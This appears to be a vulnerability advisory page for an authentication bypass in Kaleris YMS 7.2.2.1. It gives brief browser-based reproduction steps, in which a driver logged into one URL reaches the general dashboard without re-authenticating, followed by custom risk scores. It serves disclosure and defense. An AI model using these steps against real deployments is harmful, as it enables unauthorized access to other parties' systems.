Primary

Context

Kaleris YMS Authentication Bypass Vulnerability in Login Mechanism

Vulnerability

An authentication bypass vulnerability has been identified in Kaleris YMS version 7.2.2.1. This issue allows attackers to bypass login verification for the Driver User Role, enabling unauthorized access to the application's resources. The vulnerability arises from the login mechanism, which fails to properly validate authentication for drivers using different login URLs that require unique credentials. As a result, a driver can exploit this flaw to access functionalities associated with the other URL without proper authorization.

Impact

Exploitation of this vulnerability allows for unauthorized access to application resources and functionalities associated with the Driver User Role.

Reproduction

To reproduce this vulnerability, log into the YMS Truck Display URL as a driver. Once logged in, open a new tab in the same browser session and access the general home URL. The dashboard will be accessible without re-entering credentials, demonstrating the authentication bypass.

Added: Apr 6, 2026, 3:29 PM

Updated: Apr 6, 2026, 3:29 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

1.3

exploitability

6.6

remediation

0.0

relevance

5.4

threat

6.4

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

1.3

exploitability

6.6

remediation

0.0

relevance

5.4

threat

6.4

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Kaleris YMS Authentication Bypass Vulnerability in Login Mechanism

Vulnerability

Impact

Reproduction

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating